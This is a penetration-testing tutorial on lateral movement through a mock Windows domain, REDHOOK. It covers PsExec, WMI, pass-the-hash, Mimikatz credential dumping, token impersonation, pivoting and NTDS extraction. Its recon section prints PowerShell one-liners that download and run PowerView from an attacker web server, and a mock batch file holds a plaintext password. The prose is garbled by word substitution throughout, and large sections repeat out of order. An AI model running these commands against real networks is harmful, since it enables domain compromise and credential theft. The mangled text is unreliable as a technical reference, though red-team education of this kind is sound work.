Hola! In this write-up nosotros volition hold upward looking at different ways to displace laterally when compromising a Windows domain. This post is yesteryear no agency exhaustive but it should comprehend some of the to a greater extent than basic techniques as well as thought processes. To proceed things inward perspective nosotros volition hold upward next a mock objective on my local domain REDHOOK. Hopefully this volition hold upward the outset inward a serial of posts centred or hence Windows domains, if you lot guide maintain something specific you lot would similar to run into (such equally Kerberos tickets) don't hesitate to drib me an email, enjoy!
Scenario:
Our mission is to instruct usable credentials for the "redhook.DA" domain account. We are starting from a seat where the assaulter is already on the corporate network but non yet inward the same subnet equally the targeted domain controller. You tin run into a diagram of the setup below.
Additionally nosotros are going to assume the assaulter has found a laid of valid local Administrator credentials for Client 1. Typically, if the network is large enough, you lot volition discovery valid credentials stored on a network part somewhere (batch, vbs, .NET, ps1, etc.), "dir /s", "findstr /SI" as well as Find-InterestingFile are your friends. Depending on how initial access was gained you lot may guide maintain a squeamish framework to piece of work alongside similar Cobalt Strike or you lot may hold upward express to natively available functionality on a corporate workstation. For this post the assaulter is on a Kali box but I volition explicate some things you lot tin exercise when you lot alone guide maintain access to Windows. Lastly, inward the post, nosotros volition non hold upward dealing alongside SRP & AV evasion just proceed that inward the dorsum of your take away heed because AV events = bad.
Resources:
+ Active Directory Security (@PyroTek3) - here
+ harmj0y (@harmj0y) - here
+ Exploit-Monday (@mattifestation) - here
+ PowerView - here
+ PowerSploit - here
+ Impacket - here
+ Impacket compiled yesteryear maaaaz - here
+ Mimikatz - here
+ Incognito - here
+ Windows Credentials Editor - here
+ Sysinternals Suite - here
We tin speedily catch some NetBIOS information for the IP specified inward the batch script.
You tin exercise the same thing on Windows alongside "nbtstat -A IP". We tin run into that the machine holler is WIN7-ENT-CLI1 as well as that it is connected to the REDHOOK domain.
PsExec:
With metasploit's PsExec nosotros tin easily instruct a crunch on the box. Notice that bob is a local account, else the "net use" command would guide maintain specified "REDHOOK\bob". As such nosotros are non using the SMBDomain parameter.
Metasploit doesn't guide maintain the alone PsExec on offer. We tin utilization Impacket's PsExec which emulates PsExec using RemComSvc. The squeamish thing hither is that it volition also guide maintain hashes if nosotros don't guide maintain clear-text credentials, nosotros volition come upward dorsum to that later.
Finally, let's non forget Microsoft's ain PsExec which has the added exercise goodness of existence a signed executable. Adding the "-s" flag to this command would give you lot a SYSTEM shell.
WMI:
There are also a few WMI options when it comes to running remote commands. Most notable WMIC, non alone volition it allow you lot to execute commands on a remote machine but you lot tin also leverage WMI to instruct sensitive information as well as reconfigure the operating system, all using built-in tools.
Obviously you lot volition demand to hold upward a chip creative alongside "cmd.exe /c" as well as "powershell.exe -exec bypass -command" to brand command execution piece of work to your advantage. The upside hither is that almost whatever box you lot popular volition guide maintain this built-in.
Again, coming dorsum to Impacket nosotros guide maintain WmiExec which volition allow you lot to run commands as well as instruct the output, it tin also give you lot a semi-interactive crunch as well as accepts hashes.
Finally in that location is PowerSploit's Invoke-WmiCommand, this is a chip to a greater extent than labour intensive because of the PSCredential object but you lot tin instruct the command output as well as in-memory residence for the script.
Pass-The-Hash, WCE & Mimikatz:
Sometime when you lot popular a box you lot volition alone guide maintain access to the NTLM hash for the user account, non the clear text password. If, inward those cases, you lot guide maintain access to metasploit (psexec) or Impacket (pretty much all the tools back upward PTH) hence you lot volition guide maintain an tardily fourth dimension of it. If you lot are confined to the local Windows environs you lot tin soundless inject the NTLM hash into a procedure using WCE or Mimikatz.
The downside hither is that WCE is pretty much guaranteed to laid off alarms! Mimikatz on the other manus tin hold upward loaded similar a shot into retention using powershell w00t! In this case, however, I'm just using the compiled binary.
Notice that inward both cases the domain is laid to "." this is because bob is a local work organisation human relationship but this volition piece of work perfectly fine for domain accounts equally well.
We at nowadays guide maintain a lot of ways to instruct a crunch on the box. This may seem a chip excessive but it is all nigh redundancy, some situations restrain what you lot tin exercise other times a sure method volition hold upward overall to a greater extent than efficient for your intended goal. One thing you lot demand to pay attending to is that the PsExec variants volition all give you lot a SYSTEM crunch patch the WMI variants execute your commands equally the user you lot authenticated to the box with. Again in that location are some cases where 1 or the other is desirable.
Metasploit (Mimikatz & hashdump):
Pretty similar a shot frontwards from meterpreter. Use Mimikatz to instruct land text credentials for users alongside an active session as well as hashdump to instruct hashes for local accounts that are non currently logged in.
Secretsdump & Invoke-Mimikatz:
To proceed our alternatives opened upward nosotros tin instruct the same results yesteryear using Impacket's SecretsDump as well as Powersploit's Invoke-Mimikatz. In this illustration Invoke-Mimikatz is hosted on the attackers webserver, I guide maintain truncated the Mimikatz output for brevity.
There are naturally other ways you lot tin tackle this but I think these are likely the primary techniques.
Impersonation:
As nosotros desire to query domain specific information nosotros volition demand a crunch equally a domain user. This is a chip problematic because nosotros currently guide maintain a crunch equally either bob (not a domain user) or SYSTEM. Fortunately using some undocumented NtQuerySystemInformation voodoo nosotros tin discovery tokens belonging to other user accounts as well as impersonate them, this is what the good know tool incognito is based on. Additionally, nosotros know "REDHOOK\asenath.waite" is logged inward to the machine hence she volition hold upward a prime number candidate.
Meterpreter has an incognito plug-in which makes this procedure real similar a shot forward.
Alternatively you lot tin utilization the actual incognito binary yesteryear Luke Jennings which has PsExec similar functionality allowing you lot to utilization it remotely.
Finally, in that location is also PowerSploit's Invoke-TokenManipulation. Unfortunately, inward it's electrical current dry soil I can't recommend using it because nosotros can't genuinely instruct the functionality nosotros demand out of it. I guide maintain filed 2 põrnikas reports (#112 & #113), if these number are resolved (specifically 113) hence I volition update this post because inward my catch using PowerShell to exercise token impersonation would hold upward the best illustration scenario!
Domain Recon:
Now nosotros guide maintain a crunch equally a domain user nosotros demand to exercise some quick enumeration to instruct a lay of the dry soil as well as to figure out what our adjacent target volition be.
Looking over the output of our brief search gives us a pretty probable path to becoming a domain administrator. (1) It appears that the local user TemplateAdmin is an admin on both "Client 1" as well as "Client 2". (2) Though nosotros don't guide maintain clear-text credentials for TemplateAdmin nosotros guide maintain his hash which nosotros tin utilization to access "Client 2". (3) The REDHOOK\Administrator work organisation human relationship is authenticated to "Client 2", if nosotros compromise that box patch he is logged inward nosotros tin instruct his clear text credentials and/or impersonate him. At that indicate nosotros pretty much ain the domain!
Before moving on, a surprise pop-quiz question: What is the most probable argue that "REDHOOK\Administrator" is component of the domain administrators group? I imagine this could hold upward on the MCSA exam.
Socks Proxy:
One concluding thing I would similar to highlight is metasploit's mightiness to road traffic through established sessions as well as hence expose that access to the operating organisation through a sock proxy. This is real very useful if you lot guide maintain access to metasploit or something similar cobalt strike.
By creating a road through "session 1" nosotros guide maintain basically granted most metasploit modules the mightiness to hold upward executed against hosts inward the non-routable /24 subnet.
Additionally, starting a socks proxy exposes this access to our operating organisation yesteryear using proxychains. Make sure to edit the proxychains configuration file to utilization the appropriate port laid yesteryear the metasploit module.
There is alone 1 thing you lot demand to recall inward this illustration which is that the socks proxy volition alone guide maintain TCP traffic. You volition soundless hold upward able to exercise most things but just hold upward aware of this limitation.
It is non possible, using native functionality, to laid upward a socks proxy on a Windows machine. However, using netsh, nosotros tin create port forwarding rules, nosotros volition come upward dorsum to that later. Also, if you lot desire more, you lot tin catch plink as well as exercise some magic alongside SSH tunnels but that is out of compass for this write-up.
Metasploit (PortProxy & PsExec):
Even though nosotros tin range "Client 2" through our custom road inward metasploit nosotros volition guide maintain difficulties getting a connecter back. To instruct or hence this nosotros tin utilization the portproxy module to create a port forwarding dominion on "Client 1".
This may seem a chip confusing at outset but it is genuinely similar a shot forward. "Client 1" is listening on 10.1.1.2:9988 as well as is sending whatever traffic that arrives on that port to 10.0.0.128:9988. In the background this is, inward fact, wrapping circular netsh inward Windows. All that remains is to slightly reconfigure PsExec.
Impacket (PsExec) & netsh:
First nosotros volition demand to manually laid upward a port forwarding rule, using netsh, on "Client 1".
We at nowadays guide maintain a dominion laid upward which volition frontwards traffic arriving on 10.0.0.129:5678 to 10.1.1.3:445. For this to piece of work Impacket's PsExec volition demand to connect to a custom port, this is non supported out-of-the box but nosotros tin easily edit the python source.
With our modifications saved nosotros tin just PsExec to 10.0.0.129 as well as our traffic should instruct forwarded to 10.1.1.3!
Don't forget to construct clean upward the port forwarding dominion when you lot are done. The next command volition reset the port proxy configuration file.
Pure Windows?:
Unfortunately I could non discovery a way, if the assaulter is on a Windows box, to brand this piece of work natively. The number is that tools similar Sysinternals PsExec won't query non default ports. Additionally, if the attacker's machine has port 445 opened upward it volition ignore whatever port forwarding rules which nosotros configure (eg: 127.0.0.1:445 --> 10.0.0.129:5678). Temporarily disabling SMB is also non an option, it requires reconfiguring dependencies as well as rebooting the machine (Yikes!). If anyone knows whatever voodoo that volition work, delight instruct out a comment below!
In this province of affairs your best pick volition hold upward to modify as well as compile Impacket's PsExec using pyinstaller, similar to what maaaaz has done here.
Keep inward take away heed that either way it volition most probable hold upward game over. Even if nosotros can't instruct clear text credentials nosotros volition soundless hold upward able to discovery a procedure running equally REDHOOK\Administrator as well as impersonate it's token using incognito.
Metasploit Easy-Mode (Mimikatz & hashdump & incognito):
We were lucky inward this case, or non hence much equally I've done it on purpose hehe! Let's briefly guide maintain a await at incognito though, just to comprehend our bases.
Impacket (PsExec) & incognito:
Again nosotros guide maintain some limitations hither because of the pivot. To illustrate the technique I'll demo how nosotros tin utilization incognito on the remote host equally it is a chip user unfriendly (unlike Invoke-Mimikatz).
After running the command our crunch hangs (sigh..). I played or hence alongside this for quite a chip as well as I found that without the "-c" (interactive mode) parameter the crunch does non hang but the command does non execute correctly also if you lot don't grouping your commands inward a bat file hence it volition alone execute the outset 1 before hanging. Just to hold upward clear, this number alone hap when executing incognito through PsExec.
Although it is quite an ugly solution, in 1 trial nosotros log dorsum inward to the machine nosotros tin run into that our batch script ran correctly.
If anyone tin figure out a to a greater extent than elegant way to execute the incognito command, definitely instruct out a comment!
File Transfers:
Obviously I guide maintain gone a chip tardily on myself, using the "put" command inward Impacket's PsExec. Generally a expert approach would hold upward to download whatever files you lot may demand onto the pin box, you lot tin utilization PowerShell's WebClient or something similar bitsadmin. For some ideas, guide maintain a await at Parvez post here. Once the files are inward house you lot tin just create an unrestricted Windows part as well as mountain that from the host behind the pivot. You tin run into some illustration syntax below.
Socks Proxy & Impacket (WmiExec):
Remember that socks proxy nosotros laid upward earlier? We tin genuinely proxify almost everything nosotros demand to compromise the domain. The 1 caveat is that this evidently requires us to laid upward a socks proxy on the pivot. Here nosotros are using Impacket's WmiExec just to switch things upward a bit.
Simple right? Just don't rely on it to much inward illustration it is non an option!
Sysinternals (PsExec) & Invoke-Mimikatz:
Time to consummate our initial objective as well as instruct usable credentials for the REDHOOK\redhook.DA user account. This illustration is using Invoke-Mimikatz's mightiness to dump credentials on remote machines. Essentially, nosotros instruct a crunch on "Client 1" equally REDHOOK\Administrator as well as hence launch Mimikatz at the DC. We are assuming hither that REDHOOK\redhook.DA has an active session on the box.
The argue that I'm alone dumping hashes hither is that, due to enhanced protection features on 2k12 R2/Windows 8.1+, nosotros can't instruct clear text credentials for authenticated users. However, from the output nosotros tin run into that nosotros guide maintain managed to retrieve the REDHOOK\redhook.DA NTLM hash which volition hold upward to a greater extent than than plenty to authenticate to other machines inward the domain equally that user.
Notice that nosotros are just cypher padding the LM portion of the hash, it doesn't genuinely affair what nosotros pose there. We are for sure non restricted to Impacket here, Metasploit's PsExec volition also piece of work fine equally volition forging the NTLM hash of a command prompt using WCE or Mimikatz.
Volume Shadow Copy (Classic-Mode):
The most basic, living off the land, way to exercise this is to utilization vssadmin.
After getting the files dorsum to the attacker's machine (many ways to exercise this, pick 1 hehe). We tin just utilization Impacket's SecretsDump locally as well as extract the contents. The output below is truncated for brevity.
Keep inward take away heed that NTDS tin literally incorporate thousands of user accounts as well as tin hold upward real large. Also, don't become exterior your remit(!), dumping NTDS is probable to brand Admins become absolutely ballistic!
Influenza A virus subtype H5N1 real similar approach tin hold upward used alongside Invoke-NinjaCopy, you lot tin run into an illustration of this inward Sean Metcalf's post.
Socks Proxy & Impacket (SecretsDump) (Easy-Mode):
Again, ridiculous equally it seems, if nosotros guide maintain a socks proxy laid upward on the pin nosotros tin just proxify SecretsDump as well as launch it against the DC using either land text credentials or a hash!
Scenario:
Our mission is to instruct usable credentials for the "redhook.DA" domain account. We are starting from a seat where the assaulter is already on the corporate network but non yet inward the same subnet equally the targeted domain controller. You tin run into a diagram of the setup below.
Additionally nosotros are going to assume the assaulter has found a laid of valid local Administrator credentials for Client 1. Typically, if the network is large enough, you lot volition discovery valid credentials stored on a network part somewhere (batch, vbs, .NET, ps1, etc.), "dir /s", "findstr /SI" as well as Find-InterestingFile are your friends. Depending on how initial access was gained you lot may guide maintain a squeamish framework to piece of work alongside similar Cobalt Strike or you lot may hold upward express to natively available functionality on a corporate workstation. For this post the assaulter is on a Kali box but I volition explicate some things you lot tin exercise when you lot alone guide maintain access to Windows. Lastly, inward the post, nosotros volition non hold upward dealing alongside SRP & AV evasion just proceed that inward the dorsum of your take away heed because AV events = bad.
Resources:
+ Active Directory Security (@PyroTek3) - here
+ harmj0y (@harmj0y) - here
+ Exploit-Monday (@mattifestation) - here
+ PowerView - here
+ PowerSploit - here
+ Impacket - here
+ Impacket compiled yesteryear maaaaz - here
+ Mimikatz - here
+ Incognito - here
+ Windows Credentials Editor - here
+ Sysinternals Suite - here
Compromising Client 1
As I mentioned earlier, nosotros "found" user credentials for "Client 1" on a network share. Something similar this comes to mind.# Mock contents of \\FileServer\Users\bob\Workstations\ErrorLog.bat @echo off cyberspace utilization "\\10.0.0.129\C$" /user:bob ImSoSecur3! if be "\\10.0.0.129\C$\Program Files\MSBuild\ErrorLog.txt" ( echo "Sigh, to a greater extent than errors on Client1! Copying.." re-create "\\10.0.0.129\C$\Program Files\MSBuild\ErrorLog.txt" C:\Users\bob\Logs\Client1\ del "\\10.0.0.129\C$\Program Files\MSBuild\ErrorLog.txt" ) else ( echo "Yaay, no novel errors on Client1!" ) cyberspace utilization "\\10.0.0.129\C$" /delete We tin speedily catch some NetBIOS information for the IP specified inward the batch script.
You tin exercise the same thing on Windows alongside "nbtstat -A IP". We tin run into that the machine holler is WIN7-ENT-CLI1 as well as that it is connected to the REDHOOK domain.
PsExec:
With metasploit's PsExec nosotros tin easily instruct a crunch on the box. Notice that bob is a local account, else the "net use" command would guide maintain specified "REDHOOK\bob". As such nosotros are non using the SMBDomain parameter.
Metasploit doesn't guide maintain the alone PsExec on offer. We tin utilization Impacket's PsExec which emulates PsExec using RemComSvc. The squeamish thing hither is that it volition also guide maintain hashes if nosotros don't guide maintain clear-text credentials, nosotros volition come upward dorsum to that later.
Finally, let's non forget Microsoft's ain PsExec which has the added exercise goodness of existence a signed executable. Adding the "-s" flag to this command would give you lot a SYSTEM shell.
WMI:
There are also a few WMI options when it comes to running remote commands. Most notable WMIC, non alone volition it allow you lot to execute commands on a remote machine but you lot tin also leverage WMI to instruct sensitive information as well as reconfigure the operating system, all using built-in tools.
Obviously you lot volition demand to hold upward a chip creative alongside "cmd.exe /c" as well as "powershell.exe -exec bypass -command" to brand command execution piece of work to your advantage. The upside hither is that almost whatever box you lot popular volition guide maintain this built-in.
Again, coming dorsum to Impacket nosotros guide maintain WmiExec which volition allow you lot to run commands as well as instruct the output, it tin also give you lot a semi-interactive crunch as well as accepts hashes.
Finally in that location is PowerSploit's Invoke-WmiCommand, this is a chip to a greater extent than labour intensive because of the PSCredential object but you lot tin instruct the command output as well as in-memory residence for the script.
Pass-The-Hash, WCE & Mimikatz:
Sometime when you lot popular a box you lot volition alone guide maintain access to the NTLM hash for the user account, non the clear text password. If, inward those cases, you lot guide maintain access to metasploit (psexec) or Impacket (pretty much all the tools back upward PTH) hence you lot volition guide maintain an tardily fourth dimension of it. If you lot are confined to the local Windows environs you lot tin soundless inject the NTLM hash into a procedure using WCE or Mimikatz.
The downside hither is that WCE is pretty much guaranteed to laid off alarms! Mimikatz on the other manus tin hold upward loaded similar a shot into retention using powershell w00t! In this case, however, I'm just using the compiled binary.
Notice that inward both cases the domain is laid to "." this is because bob is a local work organisation human relationship but this volition piece of work perfectly fine for domain accounts equally well.
We at nowadays guide maintain a lot of ways to instruct a crunch on the box. This may seem a chip excessive but it is all nigh redundancy, some situations restrain what you lot tin exercise other times a sure method volition hold upward overall to a greater extent than efficient for your intended goal. One thing you lot demand to pay attending to is that the PsExec variants volition all give you lot a SYSTEM crunch patch the WMI variants execute your commands equally the user you lot authenticated to the box with. Again in that location are some cases where 1 or the other is desirable.
Smash-And-Grab
Having gained a foothold on the novel subnet it's fourth dimension for a classic nail as well as grab. We desire to harvest whatever credentials nosotros guide maintain access to (clear text as well as hashes) as well as figure out where nosotros tin become from there.Metasploit (Mimikatz & hashdump):
Pretty similar a shot frontwards from meterpreter. Use Mimikatz to instruct land text credentials for users alongside an active session as well as hashdump to instruct hashes for local accounts that are non currently logged in.
Secretsdump & Invoke-Mimikatz:
To proceed our alternatives opened upward nosotros tin instruct the same results yesteryear using Impacket's SecretsDump as well as Powersploit's Invoke-Mimikatz. In this illustration Invoke-Mimikatz is hosted on the attackers webserver, I guide maintain truncated the Mimikatz output for brevity.
There are naturally other ways you lot tin tackle this but I think these are likely the primary techniques.
Reconnaissance
Ok, at nowadays nosotros guide maintain access to a machine inward the REDHOOK domain which is also connected to a different subnet it's fourth dimension for some recon!Impersonation:
As nosotros desire to query domain specific information nosotros volition demand a crunch equally a domain user. This is a chip problematic because nosotros currently guide maintain a crunch equally either bob (not a domain user) or SYSTEM. Fortunately using some undocumented NtQuerySystemInformation voodoo nosotros tin discovery tokens belonging to other user accounts as well as impersonate them, this is what the good know tool incognito is based on. Additionally, nosotros know "REDHOOK\asenath.waite" is logged inward to the machine hence she volition hold upward a prime number candidate.
Meterpreter has an incognito plug-in which makes this procedure real similar a shot forward.
Alternatively you lot tin utilization the actual incognito binary yesteryear Luke Jennings which has PsExec similar functionality allowing you lot to utilization it remotely.
Finally, in that location is also PowerSploit's Invoke-TokenManipulation. Unfortunately, inward it's electrical current dry soil I can't recommend using it because nosotros can't genuinely instruct the functionality nosotros demand out of it. I guide maintain filed 2 põrnikas reports (#112 & #113), if these number are resolved (specifically 113) hence I volition update this post because inward my catch using PowerShell to exercise token impersonation would hold upward the best illustration scenario!
Domain Recon:
Now nosotros guide maintain a crunch equally a domain user nosotros demand to exercise some quick enumeration to instruct a lay of the dry soil as well as to figure out what our adjacent target volition be.
C:\Windows\System32> whoami redhook\asenath.waite C:\Windows\System32> hostname WIN7-Ent-CLI1 C:\Windows\System32> ipconfig Windows IP Configuration Ethernet adapter Local Area Connection 2: Connection-specific DNS Suffix . : localdomain Link-local IPv6 Address . . . . . : fe80::a1ba:a1ab:170c:7916%17 IPv4 Address. . . . . . . . . . . : 10.0.0.129 # Attacker's subnet Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : Ethernet adapter Bluetooth Network Connection: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::5ddc:1e6:17e9:9e15%11 IPv4 Address. . . . . . . . . . . : 10.1.1.2 # REDHOOK subnet Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.1.1.1 Tunnel adapter isatap.{8D0466B5-1F88-480C-A42D-49A871635C9A}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Tunnel adapter isatap.localdomain: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : localdomain Tunnel adapter isatap.{5CBBE015-1E1C-4926-8025-EBB59E470186}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : # Influenza A virus subtype H5N1 real pocket-size network, 3 hosts, including the 1 nosotros guide maintain just compromised. C:\Windows\System32> net view Server Name Remark ------------------------------------------------------------------------------- \\REDRUM-DC red.dc \\WIN7-ENT-CLI1 \\WIN7-ENT-CLI2 The command completed successfully. # The DC the user is authenticated to C:\Windows\System32> echo %logonserver% \\REDRUM-DC C:\Windows\System32> ping -n 1 REDRUM-DC Pinging redrum-dc.redhook.local [10.1.1.200] alongside 32 bytes of data: Reply from 10.1.1.200: bytes=32 time<1ms TTL=128 Ping statistics for 10.1.1.200: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate circular trip times inward milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms # List local users C:\Windows\System32> net user User accounts for \\WIN7-ENT-CLI1 ------------------------------------------------------------------------------- Administrator bob Guest TemplateAdmin The command completed successfully. # List REDHOOK domain users C:\Windows\System32> net user /domain The asking volition hold upward processed at a domain controller for domain RedHook.local. User accounts for \\Redrum-DC.RedHook.local ------------------------------------------------------------------------------- Administrator asenath.waite Guest john.smith krbtgt redhook.DA robert.suydam wilbur.whateley The command completed successfully. # PowerSploit => Invoke-EnumerateLocalAdmin: Find all users who are local Administrators on a box inward the network. C:\Windows\System32> powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadStrin g('http://10.0.0.128/PowerView.ps1');Invoke-EnumerateLocalAdmin" Server : Redrum-DC.RedHook.local AccountName : RedHook.local/Administrator # Be careful, Administrator is a domain user SID : S-1-5-21-129707511-1158432277-3818383092-500 inward this case, non a local user! Disabled : False IsGroup : False IsDomain : True LastLogin : 28/01/2016 21:38:22 Server : Redrum-DC.RedHook.local AccountName : RedHook.local/Enterprise Admins SID : S-1-5-21-129707511-1158432277-3818383092-519 Disabled : False IsGroup : True IsDomain : True LastLogin : Server : Redrum-DC.RedHook.local AccountName : RedHook.local/Domain Admins SID : S-1-5-21-129707511-1158432277-3818383092-512 Disabled : False IsGroup : True IsDomain : True LastLogin : Server : WIN7-ENT-CLI1.RedHook.local AccountName : WIN7-Ent-CLI1/Administrator SID : S-1-5-21-280973330-564264495-219324212-500 Disabled : ERROR IsGroup : False IsDomain : False LastLogin : Server : WIN7-ENT-CLI1.RedHook.local AccountName : RedHook.local/Domain Admins SID : S-1-5-21-129707511-1158432277-3818383092-512 Disabled : False IsGroup : True IsDomain : True LastLogin : Server : WIN7-ENT-CLI1.RedHook.local AccountName : WIN7-Ent-CLI1/bob # The local user bob is an admin on Client 1, SID : S-1-5-21-280973330-564264495-219324212-1002 nosotros knew this already. Disabled : ERROR IsGroup : False IsDomain : False LastLogin : Server : WIN7-ENT-CLI1.RedHook.local AccountName : WIN7-Ent-CLI1/TemplateAdmin # Mmm! SID : S-1-5-21-280973330-564264495-219324212-1003 Disabled : ERROR IsGroup : False IsDomain : False LastLogin : Server : WIN7-ENT-CLI2.RedHook.local AccountName : WIN7-ENT-CLI2/Administrator SID : S-1-5-21-1588183677-2924731702-2964281847-500 Disabled : ERROR IsGroup : False IsDomain : False LastLogin : Server : WIN7-ENT-CLI2.RedHook.local AccountName : RedHook.local/Domain Admins SID : S-1-5-21-129707511-1158432277-3818383092-512 Disabled : False IsGroup : True IsDomain : True LastLogin : Server : WIN7-ENT-CLI2.RedHook.local AccountName : WIN7-ENT-CLI2/TemplateAdmin # Mmm², real suspicious, the local user SID : S-1-5-21-1588183677-2924731702-2964281847-1004 TemplateAdmin is an admin on both "Client Disabled : ERROR 1" as well as "Client 2"! IsGroup : False IsDomain : False LastLogin : # PowerSploit => Get-NetSession: List active, remote, logon sessions on the DC. C:\Windows\System32> powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadStrin g('http://10.0.0.128/PowerView.ps1');Get-NetSession -ComputerName REDRUM-DC" sesi10_cname sesi10_username sesi10_time sesi10_idle_time ------------ --------------- ----------- ---------------- \\[fe80::18a3:b250:ed6a:28f0] REDRUM-DC$ 10 10 \\10.1.1.2 asenath.waite 0 0 # Same for "Client 2". Crucially, notice that the domain user REDHOOK\Administrator is authenticated to the box as well as that the connecter is originating from the DC! C:\Windows\System32> powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadStrin g('http://10.0.0.128/PowerView.ps1');Get-NetSession -ComputerName WIN7-ENT-CLI2" sesi10_cname sesi10_username sesi10_time sesi10_idle_time ------------ --------------- ----------- ---------------- \\10.1.1.200 Administrator 1721 124 \\10.1.1.2 asenath.waite 0 0 # Let's instruct some to a greater extent than information nigh that account. Again, this is listing information nigh REDHOOK\Administrator non the local administrator. C:\Windows\System32> net user Administrator /domain The asking volition hold upward processed at a domain controller for domain RedHook.local. User holler Administrator Full Name Comment Built-in work organisation human relationship for administering the computer/dom ain User's comment Country code 000 (System Default) Account active Yes Account expires Never Password in conclusion laid 25/01/2016 21:15:11 Password expires Never Password changeable 26/01/2016 21:15:11 Password required Yes User may alter password Yes Workstations allowed All Logon script User profile Home directory Last logon 28/01/2016 21:38:22 Logon hours allowed All Local Group Memberships *Administrators Global Group memberships *Domain Users *Domain Admins # Oops, he is a DA! The command completed successfully. # We also won't forget to retrieve some information nigh our fictional target REDHOOK\redhook.DA. C:\Windows\System32> net user redhook.DA /domain The asking volition hold upward processed at a domain controller for domain RedHook.local. User holler redhook.DA Full Name redhook DA Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never Password in conclusion laid 25/01/2016 21:27:37 Password expires Never Password changeable 26/01/2016 21:27:37 Password required Yes User may alter password Yes Workstations allowed All Logon script User profile Home directory Last logon 28/01/2016 21:18:56 Logon hours allowed All Local Group Memberships Global Group memberships *Enterprise Admins *Domain Admins # Our target on the other manus is the *Group Policy Creator *Schema Admins woman nurture root of DA's hehe! The command completed successfully.
Looking over the output of our brief search gives us a pretty probable path to becoming a domain administrator. (1) It appears that the local user TemplateAdmin is an admin on both "Client 1" as well as "Client 2". (2) Though nosotros don't guide maintain clear-text credentials for TemplateAdmin nosotros guide maintain his hash which nosotros tin utilization to access "Client 2". (3) The REDHOOK\Administrator work organisation human relationship is authenticated to "Client 2", if nosotros compromise that box patch he is logged inward nosotros tin instruct his clear text credentials and/or impersonate him. At that indicate nosotros pretty much ain the domain!
Before moving on, a surprise pop-quiz question: What is the most probable argue that "REDHOOK\Administrator" is component of the domain administrators group? I imagine this could hold upward on the MCSA exam.
Socks Proxy:
One concluding thing I would similar to highlight is metasploit's mightiness to road traffic through established sessions as well as hence expose that access to the operating organisation through a sock proxy. This is real very useful if you lot guide maintain access to metasploit or something similar cobalt strike.
By creating a road through "session 1" nosotros guide maintain basically granted most metasploit modules the mightiness to hold upward executed against hosts inward the non-routable /24 subnet.
Additionally, starting a socks proxy exposes this access to our operating organisation yesteryear using proxychains. Make sure to edit the proxychains configuration file to utilization the appropriate port laid yesteryear the metasploit module.
There is alone 1 thing you lot demand to recall inward this illustration which is that the socks proxy volition alone guide maintain TCP traffic. You volition soundless hold upward able to exercise most things but just hold upward aware of this limitation.
It is non possible, using native functionality, to laid upward a socks proxy on a Windows machine. However, using netsh, nosotros tin create port forwarding rules, nosotros volition come upward dorsum to that later. Also, if you lot desire more, you lot tin catch plink as well as exercise some magic alongside SSH tunnels but that is out of compass for this write-up.
Compromising Client 2
The shared local administrator account, betwixt "Client 1" as well as "Client 2", TemplateAdmin is a pretty expert indication that that they guide maintain the same credentials. As such, compromising "Client 2" is non that much different from the scenario to a higher house except that nosotros guide maintain to pin our crunch as well as nosotros demand to utilization the work organisation human relationship hash instead of the clear-text password. Below I'll demo 2 ways to exercise this, but other options are for sure possible.Metasploit (PortProxy & PsExec):
Even though nosotros tin range "Client 2" through our custom road inward metasploit nosotros volition guide maintain difficulties getting a connecter back. To instruct or hence this nosotros tin utilization the portproxy module to create a port forwarding dominion on "Client 1".
This may seem a chip confusing at outset but it is genuinely similar a shot forward. "Client 1" is listening on 10.1.1.2:9988 as well as is sending whatever traffic that arrives on that port to 10.0.0.128:9988. In the background this is, inward fact, wrapping circular netsh inward Windows. All that remains is to slightly reconfigure PsExec.
Impacket (PsExec) & netsh:
First nosotros volition demand to manually laid upward a port forwarding rule, using netsh, on "Client 1".
We at nowadays guide maintain a dominion laid upward which volition frontwards traffic arriving on 10.0.0.129:5678 to 10.1.1.3:445. For this to piece of work Impacket's PsExec volition demand to connect to a custom port, this is non supported out-of-the box but nosotros tin easily edit the python source.
With our modifications saved nosotros tin just PsExec to 10.0.0.129 as well as our traffic should instruct forwarded to 10.1.1.3!
Don't forget to construct clean upward the port forwarding dominion when you lot are done. The next command volition reset the port proxy configuration file.
C:\Windows\system32> netsh interface portproxy reset
Pure Windows?:
Unfortunately I could non discovery a way, if the assaulter is on a Windows box, to brand this piece of work natively. The number is that tools similar Sysinternals PsExec won't query non default ports. Additionally, if the attacker's machine has port 445 opened upward it volition ignore whatever port forwarding rules which nosotros configure (eg: 127.0.0.1:445 --> 10.0.0.129:5678). Temporarily disabling SMB is also non an option, it requires reconfiguring dependencies as well as rebooting the machine (Yikes!). If anyone knows whatever voodoo that volition work, delight instruct out a comment below!
In this province of affairs your best pick volition hold upward to modify as well as compile Impacket's PsExec using pyinstaller, similar to what maaaaz has done here.
Smash-And-Grab ²
This may or may non hold upward similar to our outset scenario, depending on how REDHOOK\Administrator has authenticated to "Client 2". For example, if a uncomplicated "net utilization \\10.1.1.3\C$" command was issued hence nosotros would non hold upward able to instruct clear text credentials or a hash, withal "net utilization \\10.1.1.3\C$ /user:REDHOOK\Administrator XXXXXXX" would gives us both. In essence, it depends if the REDHOOK\Administrator user genuinely typed inward their credentials when authenticating.Keep inward take away heed that either way it volition most probable hold upward game over. Even if nosotros can't instruct clear text credentials nosotros volition soundless hold upward able to discovery a procedure running equally REDHOOK\Administrator as well as impersonate it's token using incognito.
Metasploit Easy-Mode (Mimikatz & hashdump & incognito):
We were lucky inward this case, or non hence much equally I've done it on purpose hehe! Let's briefly guide maintain a await at incognito though, just to comprehend our bases.
Impacket (PsExec) & incognito:
Again nosotros guide maintain some limitations hither because of the pivot. To illustrate the technique I'll demo how nosotros tin utilization incognito on the remote host equally it is a chip user unfriendly (unlike Invoke-Mimikatz).
